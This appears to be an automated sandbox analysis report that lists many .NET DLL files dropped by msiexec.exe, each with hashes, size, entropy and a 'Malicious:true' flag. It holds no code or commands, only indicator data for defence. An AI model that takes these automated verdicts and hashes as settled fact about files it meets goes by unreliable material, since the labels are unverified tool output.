                                                                                                                                                                                                                                        SSDEEP:3072:JNEmWBQH04BekCQUVP2xrwOy09JN/KBWAUQ335BotelqKaMJDBy/x9u:/WBQ3E1kjUBoteJM/xI
                                                                                                                                                                                                                                        MD5:73744EEF11A5BD7096F5AB01661A1CF1
                                                                                                                                                                                                                                        SHA1:772C4483635EC0A417139F8955A943D3D02BBBC9
                                                                                                                                                                                                                                        SHA-256:8FA0C869538128A9FB2A95AFA1ECF51D43A955A0EF719D9613E420DEDDBC3448
                                                                                                                                                                                                                                        SHA-512:14E14D4680AA4EB6F1AB2F0679B3B4E4B67EB012D32D03BE51DD116B0264547077C78F41DDA1504B9C048FC17158BFA763A363A5A8C1115B3905E4513FF890BC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93856
                                                                                                                                                                                                                                        Entropy (8bit):6.408085753053331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9EhT10RdVH8EOY7wmlYcNLyoOeSRzmIevYcfiLrszHc:92SGEOY7K8LyheSRzmdvYqEAA
                                                                                                                                                                                                                                        MD5:081BA64231096D11B96E241626C3EFED
                                                                                                                                                                                                                                        SHA1:BA4F7864F8465DE68F6DE98B96FBE6E7444C1B1D
                                                                                                                                                                                                                                        SHA-256:B661157A26DACAAF86E88AA9E7443BA9FC19D1322B9E262B0A032320666B5E57
                                                                                                                                                                                                                                        SHA-512:4DCEAF18F9460650B7DB30FDC9A3CDF512FB9B97B482ABB0CCE54411B4A0572602F8337D4ACDB699CEB268DE11FA791B1D352276EF79AB71ABFD81BCB09ED9CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32032
                                                                                                                                                                                                                                        Entropy (8bit):6.245677631794701
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:M9WAmDijRWtbwPV0D/F/pQ+1+HCeqtwlLYmxNOcVPFNNPUHX6HRN78FRxB+R9zr8:uyeqylLYm71VPRc3W8FRxw9zb0
                                                                                                                                                                                                                                        MD5:7F6966066BECB9A1F73DA461E07A036E
                                                                                                                                                                                                                                        SHA1:D983B4C573D241577E4CD7938CF6003D11B2D8CC
                                                                                                                                                                                                                                        SHA-256:7A9399BCAD3997D9CEAD01BDD689D3B92DC68E01601446510F2BDD9B4C3BF8A7
                                                                                                                                                                                                                                        SHA-512:13313E6EEC899B4B500501A866BE5742743C78AA6252270399DEBAE200A9D88ABF5DEC10ECF3BC8850629F2BE20F7B45D71654799418E3478A14271936846EE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):134928
                                                                                                                                                                                                                                        Entropy (8bit):6.568383371998579
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sspRk/BZX3krpmsUjMM+JbVUonV0hcbGWbrrrrrrrrrrrrrrrrrrrrrrrrrrrrr+:9RMBZXCPMRcbGnt5Yq
                                                                                                                                                                                                                                        MD5:A66428FFBD2EBDED73C9BC8A8D0A76B4
                                                                                                                                                                                                                                        SHA1:988AAC80A437781CDE6596CC654DB9776FF4AD84
                                                                                                                                                                                                                                        SHA-256:914CD0D9270A667393FC5F0F6E558887D18510466B42FF4DDAA0DB415DC3AE2A
                                                                                                                                                                                                                                        SHA-512:B7B20F4ED2630B9AB9F451A64D3FD9E82DD2AB64FB33B66BF01BA239C22214AD0A895C05DA2571BF6C46B7E3FD73E4609626E3EDBFCE08C0591F5F2D03E65E16
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):569104
                                                                                                                                                                                                                                        Entropy (8bit):6.706114555400102
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dcy1XS6la/9irY6jyFOagRMb2HwpYDgP7xmBVWUw7nzNZZmbS:1XSgw9A6YDgP7xmfWUwrTEbS
                                                                                                                                                                                                                                        MD5:7ED212CA1B7E3CECDE6B278B6A7B960B
                                                                                                                                                                                                                                        SHA1:8280B9E10FCB9263A3112E43C80F988F8CECE77A
                                                                                                                                                                                                                                        SHA-256:FAF2D2080ACB553C9BF44796F2A5DFD2FD9B4D5C273A940266EFF26D6677CD02
                                                                                                                                                                                                                                        SHA-512:6E5D79A1EF29DFA58242BF52154EE0A19338ECDFD064A250056FA46F5195CBBF96DF785B1AFEF689C41BECDD75BC420C1E7EF47102861026F951A8966E688A62
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):151816
                                                                                                                                                                                                                                        Entropy (8bit):6.6623046410034386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:stiUGF+5xnwtF9cOtyeyvsuA1Hp7cyeo7Y3pN:OGAeSwasumLYL
                                                                                                                                                                                                                                        MD5:ACBCB2A44205E6CA75E4084C1CB1CFF5
                                                                                                                                                                                                                                        SHA1:846E040AB6E325EBA69A26C0B89BF9C018D5AE65
                                                                                                                                                                                                                                        SHA-256:56E35F6ACFBA99205CF2F27E9834B0B726CBCCA38A122C6CFE1ACDE1E398AC3D
                                                                                                                                                                                                                                        SHA-512:7C956DFE6C668C1466BC59F4F11A4C39325C3274B2198BEC979F3A2505BED08D16474E57843CD90ABBA930F9634A8D437CFB10FFBD9F3263C61E9344D0E1659F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.823849132456246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:n8V/1Wi4fWcYA6VFHRN7ABmo8R9zMLWN+:nIY7FCl2moQ9zPs
                                                                                                                                                                                                                                        MD5:16DAC3D892053EF71C67B2C9BDC7F403
                                                                                                                                                                                                                                        SHA1:EB39F7E2AED3922FB475B2B0CF39ED5BC16A1168
                                                                                                                                                                                                                                        SHA-256:73CF3680065CBCF6D27EB607CEF08704763EC18280F139D973F4BFC6E6C3E508
                                                                                                                                                                                                                                        SHA-512:0FD4172EAC020227EDF2AB1A79C790364789C0595E5AC215F8E21527EACCED64F901777BBC30E321D68344F7DEC9E3046C479BECD8276ED2FD7ED8A59BA98444
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.809520266690687
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1eraiTW1A3WxYA6VFHRN7ectHNsAR9z/y9R:1eraO+FCleCts89z69R
                                                                                                                                                                                                                                        MD5:B2332732ED17ACFCF4F331606CFD5B40
                                                                                                                                                                                                                                        SHA1:96455F14473711B41FC7F9E609E275010445E241
                                                                                                                                                                                                                                        SHA-256:DA85E41265986C66CFC87A6147AD6F699BE06E17318CC7228E5BC06782AAB803
                                                                                                                                                                                                                                        SHA-512:C5B85177A18DB48D74D2786F8B943D8104DAE3E30CBC6218C9834C93E8246F14D90B7428C0553B52A735AA5585A28983D8EF52018817BBC56C4D68CAA569CB54
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18720
                                                                                                                                                                                                                                        Entropy (8bit):6.611731936380794
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6+rueDWLr3WssDW5kpX6HRN7nd9R9zmwj+:weDW/0MyWl9zLj+
                                                                                                                                                                                                                                        MD5:7222BD0ED170B937B857CDA48DF38B29
                                                                                                                                                                                                                                        SHA1:EDE40D82947E7139CB96AD5E941D193AB8D25116
                                                                                                                                                                                                                                        SHA-256:91B24F7E448513335225FF739391C30CF398DFBCA53D704BD3026AD174EAC7E2
                                                                                                                                                                                                                                        SHA-512:0A20F683926A7328C74CA5552FAEFB12348DDBCD4347B32AC17A0F26FC7641C66654CEB72951338C2AD7420E097A238F62CFA372B45A1DA81EDCD8DDCA88F1A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17688
                                                                                                                                                                                                                                        Entropy (8bit):6.6159722799904985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RiSEs6760DX88kgHWGlK5WDWVWxNzx95jmHnhWgN7acWcqcADB6ZX01k9z3AvB2Y:Rx4HWyK5Wi2X6HRN7HqcTR9zi2ep
                                                                                                                                                                                                                                        MD5:0BE0FC7792DD4107FACCBB6C5E819429
                                                                                                                                                                                                                                        SHA1:7CE6C761D7197927B0C9B670B25F95FBA8677008
                                                                                                                                                                                                                                        SHA-256:9FC7DB5B190DDADA2AD2B2C5C0B428D14CD107A868B0B0D06BF83D7E4B2B1187
                                                                                                                                                                                                                                        SHA-512:50AF80A385BCE161506892B1FF136AD28C4AAFD18B27475F1362FE4FD0CA5583B00F3D1400E2CE0BBD1C6526793596500F8C90B6F4FC60E25687BCDFE91D3F2A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                                        Entropy (8bit):6.719664758889804
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:KlLKpWniklpFWTYA6VFHRN7eRxB+R9zrPGXMBu:KlcFCleRxw9zbVu
                                                                                                                                                                                                                                        MD5:6D61C8D8F949F7899E5BDF02A9186D52
                                                                                                                                                                                                                                        SHA1:3BF8837A00B740FEC56E538BBE0758323E6BE5EE
                                                                                                                                                                                                                                        SHA-256:1765BF825BD322CD3F2C9C4F282F6B4B2874AB5F54424CF88BAFDCF3806B650D
                                                                                                                                                                                                                                        SHA-512:F3219549CC1222130D4560C06EEDAD0D393F2C5F3456638FA8990D47D919BF69BB5895E2E64CEFB24057F257219B9F9BDC7946D930C098AD6E01ED37CD297607
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):871072
                                                                                                                                                                                                                                        Entropy (8bit):7.503965752504184
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:C47xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPOREDfP7/1qilhhWn8:CK9km6k/IwRYbiBeKGCtREDrZlLI8
                                                                                                                                                                                                                                        MD5:A297FAD4F040D3BE6A776823222370A1
                                                                                                                                                                                                                                        SHA1:7B21ABDAC2864A1D23580028F106ADC07D7FF079
                                                                                                                                                                                                                                        SHA-256:4C10D3F1879DCB256A5F55A4975160CB01D87B0857A71BB76C5D1B94D9735C58
                                                                                                                                                                                                                                        SHA-512:E0926A9C29E7FFDFBF6054A73CF5E0A102ECC8E1C0833E3AD67EB0F519D0D26B2C704292C19D66548AEAE1A4D49FC548CAC7D7426CB48FE5476343196D639D7A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.713017326605703
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RTZv49xxhXW6aJWA0MpWjA6Kr4PFHnhWgN7awW9xu3O6YX01k9z3ACTEmv:Rtv0XXW6aJWCYA6VFHRN7MR9zpTr
                                                                                                                                                                                                                                        MD5:9BA8E74518DE0D3C89CFD095D76774B3
                                                                                                                                                                                                                                        SHA1:4D5C19C83AAF0358557302598B305C92245FEEAD
                                                                                                                                                                                                                                        SHA-256:B577A2571AF2A31531E7AC1F42AD0E82D9ED6F0C51C91DBCEAE151974FA9D733
                                                                                                                                                                                                                                        SHA-512:A5F03F6F7E9D80662EB904E52A362269964AC2BA7D7821CEE86330BE80CD55599FF929DCB041870CA9EA10332503992CFB6AF74AF7CF78E4067D71688577D436
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.76321590690436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Rc+gBIocxxXUWfONWjypWjA6Kr4PFHnhWgN7awWtH2Wxu3O6YX01k9z3AC/Uf:SGNUWfONWOYA6VFHRN762gR9zp/Uf
                                                                                                                                                                                                                                        MD5:DE2D5FFC7DA3DDC810E5AE721879C79A
                                                                                                                                                                                                                                        SHA1:0017D411EA8D53ACF3286062344AE92966B74D71
                                                                                                                                                                                                                                        SHA-256:2A004633F91DC186CB645312BDB34B8148244BF65D9F4EF64EA0272581DF0E00
                                                                                                                                                                                                                                        SHA-512:0C24AD14FF77A63B3A829EFBBA88E5C9DF6DD74E30AE6BABF9F4F05B5F986BCAFA1572835BD20E49B5560919B313FF4EFC6862ACEF3707BE8FD73495A75F0120
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):131232
                                                                                                                                                                                                                                        Entropy (8bit):6.509086593989503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:mx6SikhsB8/IZL15zgxiFS2NjNc2aBor8c5qUCNr6iAoAnlJH9RCbFAgynBRg9Pl:mx68p/UjfYxSwKqqOAl/RNlnzg9Ra41x
                                                                                                                                                                                                                                        MD5:7D2E013F3006010DB2765A9FEFF1B6D8
                                                                                                                                                                                                                                        SHA1:E2C9523830A3CE2D5F600303307527A1C509F05B
                                                                                                                                                                                                                                        SHA-256:4399526804152950F4BBE11411495790A03DE100EE484E42E0E35F5E211C045C
                                                                                                                                                                                                                                        SHA-512:3191D9C4EFB3DC14D8BF13349A10DDED28E7647628ECE3722B0CF2656A8F1F135936A6713C5A685A701B6ECE4278EC57C4BC4FABD3B56A65D5EA00FDFECFF59A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1483016
                                                                                                                                                                                                                                        Entropy (8bit):6.815422206418889
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:6I8nUX27d6bHUw33pdQh6I1T3bpbh4kiiqggS:6Ip4EP3pWh6ybfn
                                                                                                                                                                                                                                        MD5:DF5F08F791218A56DF0814A523EF6140
                                                                                                                                                                                                                                        SHA1:9660F398F01ED1E856EB88C3C7EE4DF56875FFE4
                                                                                                                                                                                                                                        SHA-256:FDA5F4C3C49C7DD89A973B85FD369286B174604BBA731777C6C84D10C688E135
                                                                                                                                                                                                                                        SHA-512:26ABDBAC88C09E847B9B005982D709D1CC0D6AEFC58D09D98944BD7A04CDB75A6DFAA2E3B573C837906BF2C15D19A3452396A2FFE31937196FC0A3701F71FA6D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):530080
                                                                                                                                                                                                                                        Entropy (8bit):6.7790299482557845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ojaCSWfE1hvpmzn7z/HpVxn87bC/m+VvHKHhiKpwR4wcMPVZ22R3+yLAR6Bt:bW2Yzn7z/HpVxn87e/m6CHhUPVZ2qjLd
                                                                                                                                                                                                                                        MD5:E1BD563427583B969B5CD81AE03CF21C
                                                                                                                                                                                                                                        SHA1:F0951B08E22C3A111ED6551CFF96CA65BC68D5D5
                                                                                                                                                                                                                                        SHA-256:32BDA8FBC0E27628E5960023F9B3497474AD45BE38A26DB91DDCF994AEA58023
                                                                                                                                                                                                                                        SHA-512:AEF13497EC93C68AC4714FA6D1584BA3FFB05035483A1AD51F2F56272F530E4A8F830201151321DB85EA31E31EF86609FFD69115180931169CCC78FF8051305D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):125208
                                                                                                                                                                                                                                        Entropy (8bit):6.6926595622420795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:EWHXI3rkKaiG9fxBFXRPxlhzKhtTwg8AHWDV5ydNLnM:H33Z95BFXRplhOzwDDUNQ
                                                                                                                                                                                                                                        MD5:9FAC44D3F1D3714F6BCDECBC911BF634
                                                                                                                                                                                                                                        SHA1:F5FCA532CD5A29E9F41FE5FEEEB5CD1EABA42DFD
                                                                                                                                                                                                                                        SHA-256:6C05C1BF3E425FE11833522D910EC9474345102E794CB3C4A05377F28DEB0D5E
                                                                                                                                                                                                                                        SHA-512:262065DF3C55D85629E9A57AFFEC41E4DF8AF5577131F5318124AB8D9B68894A1EC8D788CAC0A25596C6D20B50B9BAC0D2DE9E5B098D034FC14CA9558D43F7D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.7130883870672715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6NB+HYCHjXuHVdHDH/WcwHWqYA6VFHRN7KmZR9zpvl:sQnhFClKmT9zH
                                                                                                                                                                                                                                        MD5:0571ACC76195386BB9D7FEFCF854C263
                                                                                                                                                                                                                                        SHA1:51C8E70BE147A9C82D49B26B5FBE9BD2EF8369CD
                                                                                                                                                                                                                                        SHA-256:0199A3E5BC94A8DDDD07EF619683B1831B13084BDCB44D30CDF959A567B69A59
                                                                                                                                                                                                                                        SHA-512:EF886BE55AEF9293A2259433C4FBB405F8BDA6A67025E235D612AC341B1A8AB3920A8B59F3E87E466300A8EC62C5813C6673F268311C967C98590061ACF2F17D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):505624
                                                                                                                                                                                                                                        Entropy (8bit):6.776900991764264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:95En4vc03uPIhST/NO/bT8jM5REzxEQRChwMeVB8v3Gu/L2SJESGskfT5v3P4m9J:95sEqChwMyB8fGdSSvBb5v3xeNEd
                                                                                                                                                                                                                                        MD5:BE2332F27FECA6E279C382151EB1F6B1
                                                                                                                                                                                                                                        SHA1:31E2F490BA6EC094FC894480D18D62FDC32993B8
                                                                                                                                                                                                                                        SHA-256:A42B2F43B7CEA67E6ED83EAAF02A487EF22EE4891ED355654B899CE9C5D3062B
                                                                                                                                                                                                                                        SHA-512:05962BCCD50DA22CD9500C3F57D4AB86BD351AD6069F30B494E3DB7DB5841FC0689092DD2C7243A11A0A853B763121EE6CA9F3B3CD693B7D3FD6BD9F05234C98
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                                        Entropy (8bit):6.806161371697177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:sz05p091rcmeD9RhGWSgXWhX6HRN750gv/6fR9z+AnVRZdn:sgAkZ6W5O9zhnLn
                                                                                                                                                                                                                                        MD5:2E73D00493B815F11A05C3F63CD4C0DF
                                                                                                                                                                                                                                        SHA1:24EA414EEF67A44D342CBAB0E154E4A6F8AF1E7B
                                                                                                                                                                                                                                        SHA-256:CF03542DBC9EE66F39B1F7FF1F3C140FFDEB95995D852E2491EF347F291C2957
                                                                                                                                                                                                                                        SHA-512:C9A9446033D4948AAFD99BB22CFA2C9D877CFAFAE63709229C6D12CAF087BEC8FDE12E6AECDBCFBE646065CCB5C55C80927680DFE4DB74D8DC96A03565CBC8FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):139024
                                                                                                                                                                                                                                        Entropy (8bit):6.704071507025856
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Sd+D1EGnNfGAKUDXxT3LBzdQZ4/FJg9G5jR291oVcJ5u5:u0yGNGAKUbxxzKZ0UaC5M
                                                                                                                                                                                                                                        MD5:871F001E647F2E6D7551532D9EE70D2D
                                                                                                                                                                                                                                        SHA1:54CF7E2831EE44826FC58235C3061CB51C2FEAFB
                                                                                                                                                                                                                                        SHA-256:5B1A7C891F6ADD857693B9714C56557F1001157F563E6FEF52379FA78EA5BFE8
                                                                                                                                                                                                                                        SHA-512:6D54B13688A72FA3291FA696B9525A4FAB7C50F35C35935F08AD5E326ECE4E15B4F1DE379F9B85BD69D543407662115ED26D94EB5C83E09CAE0DF2B644A61835
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17176
                                                                                                                                                                                                                                        Entropy (8bit):6.719573029193257
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xKJvCj4AG3tNKouqFC+TD9WHszWhEX6HRN7tce2R9zEc1C:xKNCj4LNHuk9WfK9zHA
                                                                                                                                                                                                                                        MD5:197A66A19CA592B21A8FF96863C5F0C0
                                                                                                                                                                                                                                        SHA1:E6C06A1E76583E2DA4705EF43875F955296EB039
                                                                                                                                                                                                                                        SHA-256:0DAFA5A7D8311AA41E2E40CA3E279D8ED46B8723F7AC871ADD9FBC9CFD728292
                                                                                                                                                                                                                                        SHA-512:A01233DE285889C9577E632B20F882D695C99338200F31C832EB6C8468E81F5F01E497C576E831AB23EA2E4DF78D8A248443546FCA95BBA490792A043FF2AF09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.743184429618755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hz2EoZVkD4WcU7WlYA6VFHRN7zErtHNsAR9z/4K:FwuGFClzKts89zQK
                                                                                                                                                                                                                                        MD5:42EAEAB968F6373477713CA452CFAAEB
                                                                                                                                                                                                                                        SHA1:E0AD261919F5810907B3359E586A00EC80A94804
                                                                                                                                                                                                                                        SHA-256:B25C3DC708B65DE0393F7E450105A71B480F2A5D1F8CF0E8C8580E20A5FBCBB0
                                                                                                                                                                                                                                        SHA-512:26757C8388B3D2751138F136D25110AF43ECEAF4CD2F01D5D2F113E7990F0CB98C3832B767E91F283FA215394C278365CA19C5C397641F105B325B8088063FB8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.696655038011177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:duJ92HRT5BgWEIvWqYA6VFHRN7jD/6fR9z+AGs:duSPVFClw9zhGs
                                                                                                                                                                                                                                        MD5:31939565A9F07F3F49C54FAD45801A00
                                                                                                                                                                                                                                        SHA1:65BA7980289BD49EF02850CE99D8B3925DEB6CED
                                                                                                                                                                                                                                        SHA-256:6DE1F9CD04748D01103B2CBBEAF8E9FB671F9ACA79E8A1D68D741BA3FD504B72
                                                                                                                                                                                                                                        SHA-512:0874344B998AF7178A84AF77B9E855C9202957F6519204F7EA45D3DEAE080D46166695D8AB6ABE216C9E92EEB92FDC52A75D985ABB9921CEAA505DFDF072DF29
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                                        Entropy (8bit):6.822464705364611
